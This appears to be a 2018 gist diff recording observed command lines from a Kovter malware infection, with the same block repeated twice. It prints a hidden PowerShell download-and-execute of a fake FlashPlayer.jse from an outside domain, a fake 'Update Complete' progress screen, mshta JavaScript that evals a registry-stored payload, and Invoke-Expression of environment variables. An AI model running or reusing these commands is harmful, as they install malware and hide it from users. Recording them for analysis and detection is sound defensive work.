jermdw · January 8, 2018 17:33
diff --git a/kovter.gist b/kovter.gist
 1. 
 `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+[char][byte]92+'1515369180924.js';(New-Object System.Net.WebClient).DownloadFile('http'+'s://choh5franchising.org/255284510275/1515369170878859/FlashPlayer.jse',$d);Invoke-Item $d;`

 2.

 `Parent Command Line "C:\Windows\System32\WScript.exe" "C:\Users\SVCSTO~1\AppData\Local\Temp\1515369180924.js"`

 `Process Command Line:
 "C:\Windows\System32\cmd.exe" /v /k "@echo off & color 0A &SET PRG0=[____________________] 0&SET PRG1=[##__________________] 10&SET PRG2=[####________________] 20&SET PRG3=[######______________] 30&SET PRG4=[########____________] 40&SET PRG5=[##########__________] 50&SET PRG6=[############________] 60&SET PRG7=[##############______] 70&SET PRG8=[################____] 80&SET PRG9=[##################__] 90&SET PRG10=[####################] 100&echo Please Wait...&ping -n 2 localhost >nul&(FOR /L %I IN (0,1,10) DO (cls&echo Please Wait...&echo --------------------------------------&echo Progress: !PRG%I!%&echo --------------------------------------&ping -n 4 localhost >nul))&echo Update Complete."`

 `"C:\Windows\System32\cmd.exe" /c "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression $env:wryn`

 `"C:\WINDOWS\system32\mshta.exe" javascript:IL0IgFo="ShC";GR9=new%20ActiveXObject("WScript.Shell");fCnbI4a="i7";muU09z=GR9.RegRead("HKCU\\software\\EC2u85Tie\\h3WYpQqz");DPh8bbO6="fyX";eval(muU09z);Wg6OPX8U="bKHjM";
 `

 `"C:\Windows\System32\cmd.exe" /c "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression $env:uekeyhd`
	1.
	`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+[char][byte]92+'1515369180924.js';(New-Object System.Net.WebClient).DownloadFile('http'+'s://choh5franchising.org/255284510275/1515369170878859/FlashPlayer.jse',$d);Invoke-Item $d;`

	2.

	`Parent Command Line "C:\Windows\System32\WScript.exe" "C:\Users\SVCSTO~1\AppData\Local\Temp\1515369180924.js"`

	`Process Command Line:
	"C:\Windows\System32\cmd.exe" /v /k "@echo off & color 0A &SET PRG0=[____________________] 0&SET PRG1=[##__________________] 10&SET PRG2=[####________________] 20&SET PRG3=[######______________] 30&SET PRG4=[########____________] 40&SET PRG5=[##########__________] 50&SET PRG6=[############________] 60&SET PRG7=[##############______] 70&SET PRG8=[################____] 80&SET PRG9=[##################__] 90&SET PRG10=[####################] 100&echo Please Wait...&ping -n 2 localhost >nul&(FOR /L %I IN (0,1,10) DO (cls&echo Please Wait...&echo --------------------------------------&echo Progress: !PRG%I!%&echo --------------------------------------&ping -n 4 localhost >nul))&echo Update Complete."`

	`"C:\Windows\System32\cmd.exe" /c "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression $env:wryn`

	`"C:\WINDOWS\system32\mshta.exe" javascript:IL0IgFo="ShC";GR9=new%20ActiveXObject("WScript.Shell");fCnbI4a="i7";muU09z=GR9.RegRead("HKCU\\software\\EC2u85Tie\\h3WYpQqz");DPh8bbO6="fyX";eval(muU09z);Wg6OPX8U="bKHjM";
	`

	`"C:\Windows\System32\cmd.exe" /c "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression $env:uekeyhd`
No results found